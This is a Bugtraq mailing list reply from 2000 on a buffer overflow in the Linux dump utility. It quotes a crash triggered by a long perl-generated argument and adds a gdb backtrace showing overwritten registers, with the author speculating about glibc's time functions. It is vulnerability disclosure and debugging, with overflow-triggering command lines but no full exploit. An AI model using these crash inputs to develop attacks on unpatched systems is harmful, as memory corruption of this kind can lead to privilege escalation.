Bugtraq mailing list archives

Re: [ Hackerslab bug_paper ] Linux dump buffer overflow
From: super () UDEL EDU (Derek Callaway)
Date: Wed, 1 Mar 2000 09:58:16 -0500

On Mon, 28 Feb 2000, 김용준 KimYongJun (99졸업) wrote:

[ Hackerslab bug_paper ] Linux dump buffer overflow


[loveyou () loveyou SOURCES]$ dump  -f a `perl -e 'print "x" x 556'`
  DUMP: Date of this level 0 dump: Mon Feb 28 14:45:01 2000
  DUMP: Date of last level  dump: the epoch
  DUMP: Dumping 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx to a
 파일 이름이 너무 깁니다 while opening filesystem
Segmentation fault


Could this be a problem with glibc, as well? 

[super () white dump]$ pwd
[super () white dump]$ echo -e "ru -0 `perl -e 'print "A"x5000;'`\nbt" | gdb
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
welcome to change it and/or distribute copies of it under certain
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
This GDB was configured as "i386-redhat-linux"...
(gdb) Starting program: /usr/src/redhat/SOURCES/dump-0.4b4/dump/dump -0
<snipped long string>
---Type <return> to continue, or q <return> to quit---Program received
signal SIGSEGV, Segmentation fault.
getenv (name=0x40111a70 "") at ../sysdeps/generic/getenv.c:88
88      ../sysdeps/generic/getenv.c: No such file or directory.
(gdb) #0  getenv (name=0x40111a70 "") at ../sysdeps/generic/getenv.c:88
#1  0x400b3f4a in tzset_internal (always=1094795585) at tzset.c:144
#2  0x400b4ceb in __tz_convert (timer=0xbfffd790, use_localtime=1,
    tp=0x4011e4e0) at tzset.c:575
#3  0x400b08bc in localtime (t=0xbfffd790) at localtime.c:43
#4  0x400b07f8 in ctime (t=0xbfffd790) at ctime.c:32
#5  0x804adde in main (argc=1094795585, argv=0x41414141) at main.c:355
(gdb) [super () white dump]$

From this gdb session, it appears that there _could_ be a problem with
the way that glibc's time functions behave.

/* Derek Callaway <super () udel edu> char *sites[]={"http://www.geekwise.com",
   Programmer; CE Net, Inc. "http://www.freezersearch.com/index.cfm?aff=dhc",
   (302) 837-8769           "http://www.homeworkhelp.org",0};  S () IRC  */
